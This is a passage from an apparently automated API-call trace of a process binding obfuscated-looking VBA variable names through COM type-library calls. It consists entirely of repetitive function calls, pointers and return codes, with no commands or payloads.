szNameBuf="_B_var_wZAGZGD", lHashVal=0x10fb3f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.871] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.871] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.871] IUnknown:Release (This=0x665ba50) returned 0xd [0069.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871aee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_wZAGZGD") returned 15 [0069.871] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wZAGZGD", lHashVal=0x10fb3f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x5a004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x5a004700000000, pDummy=0x0) returned 0x0 [0069.872] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b825da | out: _Dst=0x144ec0) returned 0x0 [0069.872] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tADQQUUU", lHashVal=0x109d8b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82602, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tADQQUUU") returned 9 [0069.872] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tADQQUUU", lHashVal=0x109d8b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82602, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tADQQUUU") returned 9 [0069.872] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tADQQUUU", lHashVal=0x109d8b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.872] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tADQQUUU") returned 0x109d8b [0069.872] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="tADQQUUU" | out: _Dst="tADQQUUU") returned 0x0 [0069.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="tADQQUUU") returned 9 [0069.872] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.872] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tADQQUUU", lHashVal=0x109d8b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.872] IUnknown:Release (This=0x665ba50) returned 0xd [0069.872] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.872] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tADQQUUU", lHashVal=0x109d8b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.872] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.872] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.872] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tADQQUUU", lHashVal=0x109d8b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.872] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.872] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.872] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tADQQUUU", lHashVal=0x109d8b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.872] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82602, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="tADQQUUU") returned 9 [0069.872] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tADQQUUU", lHashVal=0x109d8b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.872] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.873] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82602 | out: _Dst=0x68767a0) returned 0x0 [0069.873] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tADQQUUU") returned 0x107514 [0069.873] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_tADQQUUU" | out: _Dst="_B_var_tADQQUUU") returned 0x0 [0069.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_tADQQUUU") returned 16 [0069.873] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.873] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tADQQUUU", lHashVal=0x107514, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.873] IUnknown:Release (This=0x665ba50) returned 0xd [0069.873] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.873] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tADQQUUU", lHashVal=0x107514, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.873] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.873] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.873] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tADQQUUU", lHashVal=0x107514, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.873] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.873] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.873] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tADQQUUU", lHashVal=0x107514, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.873] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.873] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.873] IUnknown:Release (This=0x665ba50) returned 0xd [0069.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871b1e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_tADQQUUU") returned 16 [0069.873] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tADQQUUU", lHashVal=0x107514, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0) returned 0x0 [0069.873] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82602 | out: _Dst=0x144ec0) returned 0x0 [0069.873] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zAAAAA", lHashVal=0x108db9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8262e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAAAA") returned 7 [0069.873] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zAAAAA", lHashVal=0x108db9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8262e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAAAA") returned 7 [0069.874] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zAAAAA", lHashVal=0x108db9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAAAA") returned 0x108db9 [0069.874] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zAAAAA" | out: _Dst="zAAAAA") returned 0x0 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zAAAAA") returned 7 [0069.874] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.874] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zAAAAA", lHashVal=0x108db9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.874] IUnknown:Release (This=0x665ba50) returned 0xd [0069.874] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.874] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zAAAAA", lHashVal=0x108db9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.874] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.874] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.874] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zAAAAA", lHashVal=0x108db9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.874] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.874] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.874] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zAAAAA", lHashVal=0x108db9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.874] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8262e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAAAA") returned 7 [0069.874] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zAAAAA", lHashVal=0x108db9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.874] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.874] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b8262e | out: _Dst=0x68767a0) returned 0x0 [0069.874] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zAAAAA") returned 0x100823 [0069.874] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zAAAAA" | out: _Dst="_B_var_zAAAAA") returned 0x0 [0069.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zAAAAA") returned 14 [0069.874] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.874] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zAAAAA", lHashVal=0x100823, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.874] IUnknown:Release (This=0x665ba50) returned 0xd [0069.874] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.874] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zAAAAA", lHashVal=0x100823, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.875] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.875] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.875] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zAAAAA", lHashVal=0x100823, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.875] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.875] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.875] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zAAAAA", lHashVal=0x100823, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.875] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.875] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.875] IUnknown:Release (This=0x665ba50) returned 0xd [0069.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871b4e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zAAAAA") returned 14 [0069.875] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zAAAAA", lHashVal=0x100823, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.875] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8262e | out: _Dst=0x144ec0) returned 0x0 [0069.875] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mcUABcA", lHashVal=0x100a78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8267e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mcUABcA") returned 8 [0069.875] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mcUABcA", lHashVal=0x100a78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8267e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mcUABcA") returned 8 [0069.875] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mcUABcA", lHashVal=0x100a78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mcUABcA") returned 0x100a78 [0069.876] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="mcUABcA" | out: _Dst="mcUABcA") returned 0x0 [0069.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="mcUABcA") returned 8 [0069.876] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.876] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mcUABcA", lHashVal=0x100a78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.876] IUnknown:Release (This=0x665ba50) returned 0xd [0069.876] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.876] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mcUABcA", lHashVal=0x100a78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.876] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.876] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.876] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mcUABcA", lHashVal=0x100a78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.876] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.876] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.876] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mcUABcA", lHashVal=0x100a78, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.876] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8267e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mcUABcA") returned 8 [0069.876] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mcUABcA", lHashVal=0x100a78, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.876] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.876] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b8267e | out: _Dst=0x68767a0) returned 0x0 [0069.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mcUABcA") returned 0x100dfc [0069.876] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_mcUABcA" | out: _Dst="_B_var_mcUABcA") returned 0x0 [0069.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_mcUABcA") returned 15 [0069.876] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.876] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mcUABcA", lHashVal=0x100dfc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.876] IUnknown:Release (This=0x665ba50) returned 0xd [0069.876] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.876] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mcUABcA", lHashVal=0x100dfc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.876] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.876] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.877] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mcUABcA", lHashVal=0x100dfc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.877] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.877] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.877] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mcUABcA", lHashVal=0x100dfc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.877] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.877] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.877] IUnknown:Release (This=0x665ba50) returned 0xd [0069.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa871b7e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_mcUABcA") returned 15 [0069.877] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mcUABcA", lHashVal=0x100dfc, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0069.877] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b8267e | out: _Dst=0x144ec0) returned 0x0 [0069.877] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sxGccDA", lHashVal=0x10fbc7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82656, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sxGccDA") returned 8 [0069.877] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sxGccDA", lHashVal=0x10fbc7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82656, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sxGccDA") returned 8 [0069.877] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sxGccDA", lHashVal=0x10fbc7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.877] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sxGccDA") returned 0x10fbc7 [0069.877] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="sxGccDA" | out: _Dst="sxGccDA") returned 0x0 [0069.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="sxGccDA") returned 8 [0069.877] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.877] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sxGccDA", lHashVal=0x10fbc7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.877] IUnknown:Release (This=0x665ba50) returned 0xd [0069.877] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.877] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sxGccDA", lHashVal=0x10fbc7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.877] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.878] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.878] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sxGccDA", lHashVal=0x10fbc7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.878] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.878] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.878] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sxGccDA", lHashVal=0x10fbc7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.878] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82656, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sxGccDA") returned 8 [0069.878] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sxGccDA", lHashVal=0x10fbc7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.878] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.878] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82656 | out: _Dst=0x68767a0) returned 0x0 [0069.878] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sxGccDA") returned 0x10efca [0069.878] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, 